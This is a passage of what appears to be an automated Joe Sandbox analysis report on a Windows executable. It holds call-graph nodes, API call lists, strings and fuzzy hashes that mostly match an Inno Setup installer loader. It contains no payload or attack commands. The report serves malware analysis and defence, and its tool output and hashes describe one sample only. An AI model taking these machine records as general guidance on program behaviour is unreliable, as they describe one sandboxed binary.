6114->6111 6117 40a26b 6118 4025ac 4 API calls 6117->6118 6118->6115 6120 404c84 19 API calls 6119->6120 6121 40968f 6120->6121 6122 407284 5 API calls 6121->6122 6123 40969f 6122->6123 6124 408da8 4 API calls 6123->6124 6125 4096b4 6124->6125 6126 405880 4 API calls 6125->6126 6127 4096c3 6126->6127 6128 4031b8 4 API calls 6127->6128 6129 4096e2 6128->6129 6130 403198 4 API calls 6129->6130 6131 4096ea 6130->6131 6131->6091 6131->6092 6133 406af0 4 API calls 6132->6133 6134 406ba1 6133->6134 6135 403198 4 API calls 6134->6135 6136 406bbf 6135->6136 6136->6102 6138 4033b4 4 API calls 6137->6138 6139 4099df 6138->6139 6140 409a11 CreateProcessA 6139->6140 6141 409a24 CloseHandle 6140->6141 6142 409a1d 6140->6142 6144 409a2d 6141->6144 6143 409648 21 API calls 6142->6143 6143->6141 6174 409978 6144->6174 6147 409a49 6148 409978 3 API calls 6147->6148 6149 409a4e GetExitCodeProcess CloseHandle 6148->6149 6150 409a6e 6149->6150 6151 403198 4 API calls 6150->6151 6152 409a76 6151->6152 6152->6106 6152->6107 6154 409532 6153->6154 6155 4094eb 6153->6155 6154->6108 6155->6154 6156 4094f3 Sleep 6155->6156 6157 409503 Sleep 6155->6157 6159 40951a GetLastError 6155->6159 6178 408fbc 6155->6178 6156->6155 6157->6155 6159->6154 6160 409524 GetLastError 6159->6160 6160->6154 6160->6155 6162 403591 6161->6162 6163 4035a0 6161->6163 6168 4035d0 6162->6168 6169 40359b 6162->6169 6170 4035b6 6162->6170 6164 4035b1 6163->6164 6165 4035b8 6163->6165 6166 403198 4 API calls 6164->6166 6167 4031b8 4 API calls 6165->6167 6166->6170 6167->6170 6168->6170 6172 40357c 4 API calls 6168->6172 6169->6163 6171 4035ec 6169->6171 6170->6117 6171->6170 6186 403554 6171->6186 6172->6168 6175 40998c PeekMessageA 6174->6175 6176 409980 TranslateMessage DispatchMessageA 6175->6176 6177 40999e MsgWaitForMultipleObjects 6175->6177 6176->6175 6177->6144 6177->6147 6179 408f70 2 API calls 6178->6179 6180 408fd2 6179->6180 6181 408fd6 6180->6181 6182 408ff2 DeleteFileA GetLastError 6180->6182 6181->6155 6183 409010 6182->6183 6184 408fac Wow64RevertWow64FsRedirection 6183->6184 6185 409018 6184->6185 6185->6155 6188 403566 6186->6188 6189 403578 6188->6189 6190 403604 6188->6190 6189->6171 6191 40357c 6190->6191 6192 4035a0 6191->6192 6195 4035b6 6191->6195 6198 4035d0 6191->6198 6199 40359b 6191->6199 6193 4035b1 6192->6193 6194 4035b8 6192->6194 6196 403198 4 API calls 6193->6196 6197 4031b8 4 API calls 6194->6197 6195->6188 6196->6195 6197->6195 6198->6195 6201 40357c 4 API calls 6198->6201 6199->6192 6200 4035ec 6199->6200 6200->6195 6202 403554 4 API calls 6200->6202 6201->6198 6202->6200 6824 402be9 RaiseException 6825 402c04 6824->6825 6535 402af2 6536 402afe 6535->6536 6539 402ed0 6536->6539 6540 403154 4 API calls 6539->6540 6542 402ee0 6540->6542 6541 402b03 6542->6541 6544 402b0c 6542->6544 6545 402b25 6544->6545 6546 402b15 RaiseException 6544->6546 6545->6541 6546->6545 6826 402dfa 6827 402e26 6826->6827 6828 402e0d 6826->6828 6830 402ba4 6828->6830 6831 402bc9 6830->6831 6832 402bad 6830->6832 6831->6827 6833 402bb5 RaiseException 6832->6833 6833->6831 6834 4075fa GetFileSize 6835 407626 6834->6835 6836 407616 GetLastError 6834->6836 6836->6835 6837 40761f 6836->6837 6838 40748c 21 API calls 6837->6838 6838->6835 6839 406ffb 6840 407008 SetErrorMode 6839->6840 6551 403a80 CloseHandle 6552 403a90 6551->6552 6553 403a91 GetLastError 6551->6553 6554 40a282 6556 40a1f4 6554->6556 6555 40a220 6558 40a239 6555->6558 6561 40a233 RemoveDirectoryA 6555->6561 6556->6555 6557 4094d8 9 API calls 6556->6557 6557->6555 6559 40a242 73A15CF0 6558->6559 6560 40a24d 6558->6560 6559->6560 6562 40a275 6560->6562 6563 40357c 4 API calls 6560->6563 6561->6558 6564 40a26b 6563->6564 6565 4025ac 4 API calls 6564->6565 6565->6562 6566 404283 6567 4042c3 6566->6567 6568 403154 4 API calls 6567->6568 6569 404323 6568->6569 6841 404185 6842 4041ff 6841->6842 6843 4041cc 6842->6843 6844 403154 4 API calls 6842->6844 6845 404323 6844->6845 6570 40a287 6571 40a290 6570->6571 6574 40a2bb 6570->6574 6580 409448 6571->6580 6573 40a295 6573->6574 6578 40a2b3 MessageBoxA 6573->6578 6575 403198 4 API calls 6574->6575 6576 40a2f3 6575->6576 6577 403198 4 API calls 6576->6577 6579 40a2fb 6577->6579 6578->6574 6581 409454 GetCurrentProcess OpenProcessToken 6580->6581 6582 4094af ExitWindowsEx 6580->6582 6583 409466 6581->6583 6584 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6581->6584 6582->6583 6583->6573 6584->6582 6584->6583 6585 403e87 6586 403e4c 6585->6586 6587 403e67 6586->6587 6588 403e62 6586->6588 6589 403e7b 6586->6589 6592 403e78 6587->6592 6598 402674 6587->6598 6594 403cc8 6588->6594 6591 402674 4 API calls 6589->6591 6591->6592 6595 403cd6 6594->6595 6596 402674 4 API calls 6595->6596 6597 403ceb 6595->6597 6596->6597 6597->6587 6599 403154 4 API calls 6598->6599 6600 40267a 6599->6600 6600->6592 6605 407e90 6606 407eb8 VirtualFree 6605->6606 6607 407e9d 6606->6607 6854 403991 6855 403983 6854->6855 6856 40374c VariantClear 6855->6856 6857 40398b 6856->6857 6858 405b92 6860 405b94 6858->6860 6859 405bd0 6863 405930 5 API calls 6859->6863 6860->6859 6861 405be7 6860->6861 6862 405bca 6860->6862 6867 404ccc 5 API calls 6861->6867 6862->6859 6864 405c3c 6862->6864 6865 405be3 6863->6865 6866 4059a0 19 API calls 6864->6866 6868 403198 4 API calls 6865->6868 6866->6865 6869 405c10 6867->6869 6870 405c76 6868->6870 6871 4059a0 19 API calls 6869->6871 6871->6865 6610 403e95 6611 403e4c 6610->6611 6612 403e62 6611->6612 6613 403e7b 6611->6613 6615 403e67 6611->6615 6614 403cc8 4 API calls 6612->6614 6616 402674 4 API calls 6613->6616 6614->6615 6617 403e78 6615->6617 6618 402674 4 API calls 6615->6618 6616->6617 6618->6617 6619 403a97 6620 403aac 6619->6620 6621 403bbc GetStdHandle 6620->6621 6622 403b0e CreateFileA 6620->6622 6632 403ab2 6620->6632 6623 403c17 GetLastError 6621->6623 6627 403bba 6621->6627 6622->6623 6624 403b2c 6622->6624 6623->6632 6626 403b3b GetFileSize 6624->6626 6624->6627 6626->6623 6628 403b4e SetFilePointer 6626->6628 6629 403be7 GetFileType 6627->6629 6627->6632 6628->6623 6633 403b6a ReadFile 6628->6633 6631 403c02 CloseHandle 6629->6631 6629->6632 6631->6632 6633->6623 6634 403b8c 6633->6634 6634->6627 6635 403b9f SetFilePointer 6634->6635 6635->6623 6636 403bb0 SetEndOfFile 6635->6636 6636->6623 6636->6627 6890 4011aa 6891 4011ac GetStdHandle 6890->6891 6229 4076ac SetEndOfFile 6230 4076c3 6229->6230 6231 4076bc 6229->6231 6232 40748c 21 API calls 6231->6232 6232->6230 6640 4028ac 6641 402594 4 API calls 6640->6641 6642 4028b6 6641->6642 6643 401ab9 6644 401a96 6643->6644 6645 401aa9 RtlDeleteCriticalSection 6644->6645 6646 401a9f RtlLeaveCriticalSection 6644->6646 6646->6645

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 127 409b97 124->127 128 409b99-409b9b 124->128 125->124 126 409b7a-409b7d 125->126 126->124 129 409b7f-409b82 126->129 127->128 130 409baa-409bad 128->130 129->124 129->128 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 133 409bb3-409bc0 VirtualProtect 132->133 133->121
                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                    • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                    • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2441996862-0
                                                                                    • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                    • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                    • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                    • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                    APIs
                                                                                    • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                    • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                    • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                    • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModulePolicyProcess
                                                                                    • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                    • API String ID: 3256987805-3653653586
                                                                                    • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                    • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                    • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                    • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C50), ref: 0040966C
                                                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                    • SetWindowLongA.USER32(00010480,000000FC,00409918), ref: 0040A148
                                                                                    • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                    • 73A15CF0.USER32(00010480,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                    • API String ID: 3341979996-3001827809
                                                                                    • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                    • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                                    • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                    • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                    • API String ID: 1646373207-2130885113
                                                                                    • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                    • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                                    • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                    • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                    • SetWindowLongA.USER32(00010480,000000FC,00409918), ref: 0040A148
                                                                                      • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                      • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                                      • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000), ref: 00409A28
                                                                                      • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                      • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                      • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90), ref: 00409A5C
                                                                                    • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                    • 73A15CF0.USER32(00010480,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                    • API String ID: 978128352-3001827809
                                                                                    • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                    • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                                    • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                    • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90,00000000), ref: 00409A28
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                    • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02087C50,00409A90), ref: 00409A5C
                                                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02087C50), ref: 0040966C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                    • String ID: D
                                                                                    • API String ID: 3356880605-2746444292
                                                                                    • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                    • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                                    • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                    • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message
                                                                                    • String ID: .tmp$y@
                                                                                    • API String ID: 2030045667-2396523267
                                                                                    • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                    • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                                    • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                    • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message
                                                                                    • String ID: .tmp$y@
                                                                                    • API String ID: 2030045667-2396523267
                                                                                    • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                    • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                                    • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                    • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                    • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                                    • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                    • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 261 401430-40143d 262 401446-40144c 261->262 263 40143f-401444 261->263 264 401452-40146a VirtualAlloc 262->264 263->264 265 40146c-40147a call 4012e4 264->265 266 40148f-401492 264->266 265->266 269 40147c-40148d VirtualFree 265->269 269->266
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFree
                                                                                    • String ID: 4F
                                                                                    • API String ID: 2087232378-474559816
                                                                                    • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                    • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                    • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                    • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
